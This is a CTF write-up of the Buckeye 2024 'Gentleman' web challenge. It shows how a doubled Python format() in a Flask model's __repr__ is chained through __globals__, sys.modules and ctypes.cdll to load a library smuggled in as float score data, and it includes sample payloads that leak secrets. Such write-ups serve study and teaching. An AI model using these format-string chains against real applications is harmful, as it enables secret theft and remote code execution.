Buckeye 2024 was a kinda fun CTF (except for web, where I struggled a little bit). But in the end, .;,;. full cleared and secured first place! Gentleman was an interesting challenge, so here is the writeup.
TLDR: there is a format string vulnerability inside a class, and the app also has an arbitrary file upload. Here is the payload to achieve RCE:
Opening the website, we see a normal TypeMonkey site with login and signup functionality:
The provided source code comes with a Docker setup based on python:3.12-slim-bookworm:
The email is interesting, but it’s super unclear what the email is referring to. I also tried to look it up, but nothing about this email is real. ¯\_(ツ)_/¯
There is a readflag binary for reading flag.txt, set up with chown root:root /readflag && chmod 4755 /readflag (so it runs setuid root). So clearly, something inside the challenge must lead to remote code execution in order to get the flag.
The TypeMonkey app uses Flask as the main server and SQLAlchemy for the user database. The Flask session is signed using SECRET_KEY = token_urlsafe()[:32], so it’s pretty safe.
Reading through the source, models.py looks a little bit suspicious:
Format string
Inside the User model, there is this extra __repr__ function. When we print a Python object or convert it to a string, Python calls the object’s __repr__ (unless the class defines its own __str__). Every object inherits a default __repr__, but you can choose to override it.
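As a quick illustration of that fallback (a toy class with made-up names, not the challenge code), str() ends up in __repr__ when no __str__ is defined:

```python
class Player:
    def __init__(self, name):
        self.name = name

    def __repr__(self):
        # Custom representation instead of the default <Player object at 0x...>
        return f"Player(name={self.name!r})"


p = Player("alice")

# No __str__ is defined, so str() (and print()) fall back to __repr__.
as_str = str(p)
as_repr = repr(p)
print(as_str)
```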
Overriding __repr__ is not harmful by itself. But here we control the username, and the function applies format() twice. That creates a problem:
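There are two format()s here. The first format finds the {} and fills in the content; here, it fills in the username. The second format then processes the result again, so anything in the username that looks like a format field gets interpreted. We can craft a bad username that leads to accessing other objects: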
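The original models.py is not reproduced here, so the following is only a minimal sketch of the double-format pattern. The User class, its fields, and the template string are all hypothetical stand-ins, not the challenge code:

```python
class User:
    def __init__(self, username, password):
        self.username = username
        self.password = password

    def __repr__(self):
        # Pass 1: the username is pasted into the template.
        template = "<User {}>".format(self.username)
        # Pass 2: the result is formatted again, so any {...} that came
        # from the username is now treated as a replacement field.
        return template.format(self=self)


normal = repr(User("alice", "hunter2"))
leaky = repr(User("{self.password}", "hunter2"))
print(normal)
print(leaky)
```

With a harmless username nothing special happens, but a username containing a replacement field is resolved against the object passed to the second format().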
However, Python format strings have a restriction: they can’t call functions from within the format string (more info here: HackTricks).
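A small sketch of that restriction: attribute access works inside a replacement field, but call syntax is just treated as part of the attribute name and fails.

```python
# Plain attribute access inside a replacement field is allowed.
attr_only = "{0.real}".format(42)

# Call syntax is not: "upper()" is looked up as a literal attribute name.
try:
    "{0.upper()}".format("abc")
    outcome = "called"
except AttributeError as exc:
    outcome = f"AttributeError: {exc}"

print(attr_only)
print(outcome)
```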
Moving on:
The __repr__ function is called here, by str(user). I just added a print() statement inside the User class to find where it’s being called.
No function call? Access denied?
Now we know the goal is to get RCE, and the only vulnerability we have right now is this format string. The format string passes in a User object. What can we do with it? Usually, we can steal secrets with it! For example:
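As a hedged sketch of this kind of leak (the SECRET_KEY value and the User class below are made up for the demo), a format field can walk from an instance to a method, then to the globals of the module that defines it:

```python
SECRET_KEY = "not-the-real-key"  # hypothetical module-level secret


class User:
    def __init__(self, username):
        self.username = username


user = User("guest")

# instance -> bound __init__ -> globals of the defining module -> secret
payload = "{0.__init__.__globals__[SECRET_KEY]}"
leaked = payload.format(user)
print(leaked)
```

Note that keys inside [] are written without quotes in a format field.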
We can steal something from the main code. However, the issue is that the server doesn’t return anything:
Due to this limitation, we need to find a way to achieve RCE. As demonstrated in the previous example, we might be able to invoke functions using []! By default, [] triggers the __getitem__ method of the Python object. Additionally, accessing an attribute like object.something goes through the object’s attribute lookup, which falls back to object.__getattr__(something) when the class defines it and the normal lookup fails. In fact, every Python operation is essentially a function call!
If there is something we can call, even if we can’t control the code or what we can call, we might still achieve RCE by finding a vulnerability deep within __getitem__ or __getattr__:
Although inside the format string we don’t have many built-ins and we only passed in a class, we can still access other objects inside Python. We will discuss later how we can get it, but assume we have all the objects accessible, what do we have right now?
Interesting packages are imported in here, such as numpy, json, werkzeug, jinja2, flask, sqlalchemy, etc.:
Even without considering the imported classes, within the Python standard library, there are more than two hundred specially defined __getitem__ methods. It’s overwhelming! How can we identify some dangerous __getitem__ or __getattr__ methods?
So we did a more systematic search to find all the classes that have __getitem__ and __getattr__ defined:
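A minimal sketch of what such a search could look like (an illustration, not the exact script we used; find_hooked_classes is a made-up helper name). It only looks at modules that are already imported and at classes that define the hook directly:

```python
import collections  # imported only so the demo has a known hit
import sys


def find_hooked_classes(hooks=("__getitem__", "__getattr__")):
    """Map 'module.Class' to the hooks defined directly on that class."""
    found = {}
    # Copy the items first: sys.modules can change while we iterate.
    for _mod_name, module in list(sys.modules.items()):
        try:
            members = list(vars(module).values())
        except TypeError:
            continue  # some sys.modules entries are not real modules
        for obj in members:
            try:
                if not isinstance(obj, type):
                    continue
                defined = [h for h in hooks if h in vars(obj)]
                if defined:
                    found[f"{obj.__module__}.{obj.__qualname__}"] = defined
            except Exception:
                continue  # skip objects that misbehave on inspection
    return found


hits = find_hooked_classes()
print(len(hits), "classes define at least one of the hooks")
```

Running this inside the target's environment (with its imports loaded) gives the candidate list to go through by hand.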
We examined each one individually, trying to find useful ones:
tempfile._TemporaryFileWrapper looks suspicious, but it’s not useful.
sqlalchemy.orm.util.AliasedClass is not useful either:
weakref.WeakValueDictionary is not useful either:
EntryPoints from importlib.metadata is not useful either:
All of them have potential, yet none of them are helpful.
Time to Do the Impossible!
My teammate Quasar knew this before we did all of this analysis:
But we all ignored this and were so hyperfocused on the author’s hint about the Python standard library:
After a while trying to find the needle, we turned back to the idea of ctypes:
ctypes.cdll has a specialized __getitem__ function, which means every time we do ctypes.cdll['libc.so.6'] it will automatically load libc.so.6, which is amazing! However, we were struggling and didn’t know what to load. We tried to load /readflag, but the way it was compiled prevents it from being loaded:
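To illustrate the auto-loading behaviour, here is a small sketch. It assumes a system where ctypes.util.find_library can locate the C library, and it simply skips the load otherwise:

```python
import ctypes
import ctypes.util

libc_name = ctypes.util.find_library("c")  # may be None on some systems

loaded = None
rendered = None
if libc_name is not None:
    try:
        # Indexing cdll goes through LibraryLoader.__getitem__,
        # which loads the named shared library.
        loaded = ctypes.cdll[libc_name]
        # The same lookup written as a format field, with no call syntax.
        rendered = ("{0.cdll[" + libc_name + "]}").format(ctypes)
    except (OSError, AttributeError):
        pass  # library could not be loaded on this system

print(loaded, rendered)
```

Loading a shared library runs its initialization code, so anything we can get loaded this way gives us code execution.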
We also tried to load the cpython module, but there was nothing really helpful in there, so we went through the source code again to find this:
It saves the score (with no limit on how many scores), which is a numpy array, to a file! And according to the numpy documentation, the output doesn’t have a header:
This means we have arbitrary file upload; we just never found it before and didn’t know it might have been helpful. But now everything has changed. We just need a library. Why don’t we just upload a library with bad code?
Payload time!
When we got to this point, there were only 50 minutes left in the CTF. It was super stressful and fun. We decided to just set up a reverse shell:
Compile this to libtest.so, and convert its bytes to Python floats. However, the server will only save the score if it is bigger than the previous one, which means if the float has null, it won’t work.
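A rough sketch of the conversion, assuming the score file is a raw dump of little-endian 64-bit floats (an assumption; the helper names are made up and our actual script is not shown here). It also flags chunks that decode to NaN, since NaN never compares greater than anything; whether that is exactly the failure case mentioned above is also an assumption:

```python
import math
import struct


def bytes_to_floats(blob):
    # Pad to a multiple of 8 bytes, then read each chunk as a double.
    padded = blob + b"\x00" * (-len(blob) % 8)
    return [struct.unpack_from("<d", padded, i)[0]
            for i in range(0, len(padded), 8)]


def floats_to_bytes(values):
    # What a headerless dump of these doubles would contain.
    return b"".join(struct.pack("<d", v) for v in values)


blob = bytes(range(64))  # stand-in for the bytes of libtest.so
scores = bytes_to_floats(blob)
round_trip = floats_to_bytes(scores)
nan_positions = [i for i, v in enumerate(scores) if math.isnan(v)]
print(len(scores), "floats,", len(nan_positions), "NaN chunks")
```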
Now we have a score that will result in the file that we want; we just need to figure out how to recover ctypes:
Here, __init__ gives us a function. From it we access __globals__, get __builtins__, use __loader__ to reach the sys module, get ctypes from inside sys, and load our library through cdll.
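The idea can be sketched with a shortened, hypothetical chain. This demo imports sys into its own module so the format field can reach it in one hop, whereas the chain described above takes extra hops through __builtins__ and __loader__ to get to sys. The User class is a stand-in as well:

```python
import ctypes  # imported so that "ctypes" is present in sys.modules
import sys     # imported so that "sys" sits in this module's globals


class User:
    def __init__(self, username):
        self.username = username


# instance -> __init__ -> module globals -> sys -> loaded modules -> ctypes -> cdll
chain = "{0.__init__.__globals__[sys].modules[ctypes].cdll}"
reached = chain.format(User("guest"))
print(reached)
```

Appending a [path] index to the end of such a chain is what triggers the library load, with the path pointing at the uploaded file.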